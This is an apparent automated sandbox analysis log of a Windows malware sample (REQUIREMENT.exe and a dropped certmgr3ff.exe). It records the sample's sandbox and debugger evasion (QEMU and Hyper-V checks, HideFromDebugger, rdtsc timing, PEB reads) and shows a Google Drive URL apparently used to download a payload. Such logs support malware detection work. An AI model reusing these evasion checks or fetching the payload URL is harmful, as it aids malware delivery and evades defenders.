Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1CAVMVFHBKRKR58KPBP8YMMPJAEJZGE13

Source: C:\Windows\explorer.exe TID: 412	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 2976	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 2976	Thread sleep time: -206000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Code function: 1_2_023BA0C0 rdtsc

1_2_023BA0C0

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DFA80 FindFirstFileW,FindNextFileW,FindClose,		13_2_027DFA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DFA79 FindFirstFileW,FindNextFileW,FindClose,		13_2_027DFA79

Source: C:\Users\user\Desktop\REQUIREMENT.exe

System information queried: ModuleInformation

Jump to behavior

Source: certmgr3ff.exe, 0000001C.00000002.35819307372.000000000086F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWY:
Source: certmgr3ff.exe, 0000001B.00000002.35777835368.0000000000848000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWx
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWp
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp, explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp, systray.exe, 0000000D.00000002.37530796662.0000000002ACD000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001A.00000003.35641309479.00000000008A9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778675696.00000000008E1000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35819307372.000000000086F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: certmgr3ff.exe, 0000001A.00000002.35648519943.0000000000844000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWh
Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW^
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: certmgr3ff.exe, 0000001B.00000002.35778675696.00000000008E1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW~h
Source: firefox.exe, 00000015.00000002.35251475705.000001E9274E0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13
Source: certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(4
Source: explorer.exe, 00000009.00000000.32893898674.0000000010F10000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Code function: 1_2_023BA0C0 rdtsc

1_2_023BA0C0

Source: C:\Users\user\Desktop\REQUIREMENT.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B9C43 mov eax, dword ptr fs:[00000030h]	1_2_023B9C43
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B7244 mov eax, dword ptr fs:[00000030h]	1_2_023B7244
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BAAF9 mov eax, dword ptr fs:[00000030h]	1_2_023BAAF9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B94D3 mov eax, dword ptr fs:[00000030h]	1_2_023B94D3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BBE80 mov eax, dword ptr fs:[00000030h]	3_2_1E9BBE80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9A1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1E9A1EB2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D1ED8 mov eax, dword ptr fs:[00000030h]	3_2_1E9D1ED8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBED0 mov eax, dword ptr fs:[00000030h]	3_2_1E9CBED0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA33EFC mov eax, dword ptr fs:[00000030h]	3_2_1EA33EFC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA17EC3 mov eax, dword ptr fs:[00000030h]	3_2_1EA17EC3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA17EC3 mov ecx, dword ptr fs:[00000030h]	3_2_1EA17EC3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C1EED mov eax, dword ptr fs:[00000030h]	3_2_1E9C1EED
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C1EED mov eax, dword ptr fs:[00000030h]	3_2_1E9C1EED
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C1EED mov eax, dword ptr fs:[00000030h]	3_2_1E9C1EED
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA59ED2 mov eax, dword ptr fs:[00000030h]	3_2_1EA59ED2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993EE2 mov eax, dword ptr fs:[00000030h]	3_2_1E993EE2
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98BE18 mov ecx, dword ptr fs:[00000030h]	3_2_1E98BE18
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993E14 mov eax, dword ptr fs:[00000030h]	3_2_1E993E14
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993E14 mov eax, dword ptr fs:[00000030h]	3_2_1E993E14
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993E14 mov eax, dword ptr fs:[00000030h]	3_2_1E993E14
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25E30 mov eax, dword ptr fs:[00000030h]	3_2_1EA25E30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25E30 mov ecx, dword ptr fs:[00000030h]	3_2_1EA25E30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25E30 mov eax, dword ptr fs:[00000030h]	3_2_1EA25E30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25E30 mov eax, dword ptr fs:[00000030h]	3_2_1EA25E30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25E30 mov eax, dword ptr fs:[00000030h]	3_2_1EA25E30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA25E30 mov eax, dword ptr fs:[00000030h]	3_2_1EA25E30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E993E01 mov eax, dword ptr fs:[00000030h]	3_2_1E993E01
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FE1F mov eax, dword ptr fs:[00000030h]	3_2_1EA0FE1F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FE1F mov eax, dword ptr fs:[00000030h]	3_2_1EA0FE1F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FE1F mov eax, dword ptr fs:[00000030h]	3_2_1EA0FE1F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FE1F mov eax, dword ptr fs:[00000030h]	3_2_1EA0FE1F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98FE40 mov eax, dword ptr fs:[00000030h]	3_2_1E98FE40
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98DE45 mov eax, dword ptr fs:[00000030h]	3_2_1E98DE45
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98DE45 mov ecx, dword ptr fs:[00000030h]	3_2_1E98DE45
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991E70 mov eax, dword ptr fs:[00000030h]	3_2_1E991E70
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9C7E71 mov eax, dword ptr fs:[00000030h]	3_2_1E9C7E71
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0DE50 mov eax, dword ptr fs:[00000030h]	3_2_1EA0DE50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0DE50 mov eax, dword ptr fs:[00000030h]	3_2_1EA0DE50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0DE50 mov ecx, dword ptr fs:[00000030h]	3_2_1EA0DE50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0DE50 mov eax, dword ptr fs:[00000030h]	3_2_1EA0DE50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0DE50 mov eax, dword ptr fs:[00000030h]	3_2_1EA0DE50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98BE60 mov eax, dword ptr fs:[00000030h]	3_2_1E98BE60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98BE60 mov eax, dword ptr fs:[00000030h]	3_2_1E98BE60
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9BBF93 mov eax, dword ptr fs:[00000030h]	3_2_1E9BBF93
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E991FAA mov eax, dword ptr fs:[00000030h]	3_2_1E991FAA
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E989FD0 mov eax, dword ptr fs:[00000030h]	3_2_1E989FD0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E98BFC0 mov eax, dword ptr fs:[00000030h]	3_2_1E98BFC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA11FC9 mov eax, dword ptr fs:[00000030h]	3_2_1EA11FC9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FFDC mov eax, dword ptr fs:[00000030h]	3_2_1EA0FFDC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FFDC mov eax, dword ptr fs:[00000030h]	3_2_1EA0FFDC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FFDC mov eax, dword ptr fs:[00000030h]	3_2_1EA0FFDC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FFDC mov ecx, dword ptr fs:[00000030h]	3_2_1EA0FFDC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FFDC mov eax, dword ptr fs:[00000030h]	3_2_1EA0FFDC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FFDC mov eax, dword ptr fs:[00000030h]	3_2_1EA0FFDC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBF0C mov eax, dword ptr fs:[00000030h]	3_2_1E9CBF0C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBF0C mov eax, dword ptr fs:[00000030h]	3_2_1E9CBF0C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9CBF0C mov eax, dword ptr fs:[00000030h]	3_2_1E9CBF0C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FF03 mov eax, dword ptr fs:[00000030h]	3_2_1EA0FF03
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1EA0FF03 mov eax, dword ptr fs:[00000030h]	3_2_1EA0FF03
